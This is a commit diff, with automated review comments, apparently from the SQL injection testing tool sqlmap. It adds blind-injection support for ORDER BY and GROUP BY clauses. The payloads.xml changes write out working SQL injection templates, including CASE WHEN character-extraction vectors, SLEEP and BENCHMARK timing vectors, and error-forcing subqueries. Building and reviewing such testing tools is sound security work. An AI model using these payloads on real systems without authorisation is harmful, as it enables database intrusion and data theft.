

Commit 9d55c4d

committed
Done with support for injection in ORDER BY and GROUP BY (hopefully)
1 parent 91c3cf8 commit 9d55c4d

2 files changed

Lines changed: 39 additions & 35 deletions


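--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -155,14 +155,14 @@ def prefixQuery(self, string):
 # payload, do not put a space after the prefix
 if kb.technique == 4:
 query = kb.injection.prefix
+elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
+if kb.technique != 3:
+query = kb.injection.prefix
 elif kb.technique and kb.technique in kb.injection.data:
 where = kb.injection.data[kb.technique].where
 
 if where == 3:
 query = kb.injection.prefix
-elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ]:
-if kb.technique != 3:
-query = kb.injection.prefix
 
 if query is None:
 query = "%s " % kb.injection.prefix
@@ -212,6 +212,12 @@ def cleanupPayload(self, payload, origvalue=None):
 
 payload = payload.replace("[ORIGVALUE]", origvalue)
 
+if kb.dbms is not None:
+# NOTE: ugly hack due to queries.xml's <inference> tag
+# starting with 'AND ' string
+inferenceQuery = queries[kb.dbms].inference.query[4:]
+payload = payload.replace("[INFERENCE]", inferenceQuery)
+
 return payload
 
 def getComment(self, reqObj):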
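Review bot: The `[4:]` slice in cleanupPayload (new line 218) silently assumes every `queries[kb.dbms].inference.query` starts with `AND `; for a DBMS whose `<inference>` entry uses a different prefix or case, the first four characters of the real query are dropped and a malformed condition is sent. Make the strip explicit instead of positional: `inferenceQuery = queries[kb.dbms].inference.query` / `if inferenceQuery.upper().startswith("AND "):` / `    inferenceQuery = inferenceQuery[4:]`. Note also that the replacement only runs when `kb.dbms is not None`, so the literal `[INFERENCE]` marker used by the generic vectors in xml/payloads.xml in this same commit stays in the payload when no DBMS has been identified yet — presumably callers never reach this path with an unknown DBMS, but a one-line comment stating that assumption would help. Both prefixQuery and cleanupPayload start outside their hunks.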

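--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -402,7 +402,6 @@ Formats:
 <risk>1</risk>
 <clause>1</clause>
 <where>1</where>
-<vector></vector>
 <request>
 <payload>AND [RANDNUM]=[RANDNUM]</payload>
 </request>
@@ -418,7 +417,6 @@ Formats:
 <risk>3</risk>
 <clause>1</clause>
 <where>1</where>
-<vector></vector>
 <request>
 <payload>OR [RANDNUM]=[RANDNUM]</payload>
 </request>
@@ -430,14 +428,32 @@ Formats:
 
 
 <!-- Boolean-based blind tests - GROUP BY and ORDER BY clauses -->
+<!-- TODO: check against Microsoft Access and SAP MaxDB -->
+<!-- NOTE: this does not behave as expected against SQLite -->
+<test>
+<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
+<stype>1</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>, (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
+<request>
+<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
+</request>
+<response>
+<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
+</response>
+</test>
+
 <test>
 <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
 <stype>1</stype>
 <level>3</level>
 <risk>1</risk>
 <clause>2,3</clause>
 <where>1</where>
-<vector></vector>
+<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</vector>
 <request>
 <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
 </request>
@@ -457,7 +473,7 @@ Formats:
 <risk>1</risk>
 <clause>2,3</clause>
 <where>1</where>
-<vector></vector>
+<vector>, (SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
 <request>
 <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
 </request>
@@ -476,7 +492,7 @@ Formats:
 <risk>1</risk>
 <clause>3</clause>
 <where>1</where>
-<vector></vector>
+<vector>, (SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
 <request>
 <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
 </request>
@@ -495,7 +511,7 @@ Formats:
 <risk>1</risk>
 <clause>3</clause>
 <where>1</where>
-<vector></vector>
+<vector>, (SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
 <request>
 <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
 </request>
@@ -507,24 +523,6 @@ Formats:
 </details>
 </test>
 
-<!-- TODO: check against Microsoft Access and SAP MaxDB -->
-<!-- NOTE: this does not behave as expected against SQLite -->
-<test>
-<title>Generic boolean-based blind - GROUP BY and ORDER BY clauses (append)</title>
-<stype>1</stype>
-<level>3</level>
-<risk>1</risk>
-<clause>2,3</clause>
-<where>1</where>
-<vector></vector>
-<request>
-<payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
-</request>
-<response>
-<comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
-</response>
-</test>
-
 <test>
 <title>MySQL &gt;= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses (replace)</title>
 <stype>1</stype>
@@ -552,7 +550,7 @@ Formats:
 <risk>1</risk>
 <clause>2,3</clause>
 <where>3</where>
-<vector></vector>
+<vector>(SELECT (CASE WHEN (ORD(MID((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
 <request>
 <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
 </request>
@@ -571,7 +569,7 @@ Formats:
 <risk>1</risk>
 <clause>3</clause>
 <where>3</where>
-<vector></vector>
+<vector>(SELECT (CASE WHEN (ASCII(SUBSTRING((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
 <request>
 <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
 </request>
@@ -590,7 +588,7 @@ Formats:
 <risk>1</risk>
 <clause>3</clause>
 <where>3</where>
-<vector></vector>
+<vector>(SELECT (CASE WHEN (ASCII(SUBSTR((%s), %d, 1)) > %d) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</vector>
 <request>
 <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
 </request>
@@ -611,7 +609,7 @@ Formats:
 <risk>1</risk>
 <clause>2,3</clause>
 <where>3</where>
-<vector></vector>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END))</vector>
 <request>
 <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
 </request>
@@ -1216,7 +1214,7 @@ Formats:
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
+<vector>AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
 <request>
 <payload>AND SLEEP([SLEEPTIME])</payload>
 </request>
@@ -1236,7 +1234,7 @@ Formats:
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
+<vector>AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
 <request>
 <payload>AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
 </request>
@@ -1303,7 +1301,7 @@ Formats:
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
+<vector>OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME]))</vector>
 <request>
 <payload>OR SLEEP([SLEEPTIME])</payload>
 </request>
@@ -1323,7 +1321,7 @@ Formats:
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
+<vector>OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</vector>
 <request>
 <payload>OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))</payload>
 </request>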
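Review bot: The new `[INFERENCE]` placeholder (vectors at new lines 440 and 612, and the four time-based vectors from new line 1217 on) is not described anywhere in this file, although every hunk header shows the surrounding `Formats:` comment block, which is presumably where the other placeholders are explained; add an entry there along the lines of `[INFERENCE]: replaced by lib/core/agent.py cleanupPayload with the DBMS-specific inference query from queries.xml, only once the back-end DBMS is known`. The file now mixes two templating conventions in the same section: the generic and time-based vectors use `[INFERENCE]`, while the DBMS-specific vectors at new lines 456-515 and 553-591 still use `%s`/`%d` format specifiers, so without that comment a reader cannot tell which vectors are expanded by string replacement and which by `%` formatting. Apart from the generic test added in the third hunk, every `<test>` element touched here starts or ends outside its hunk.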
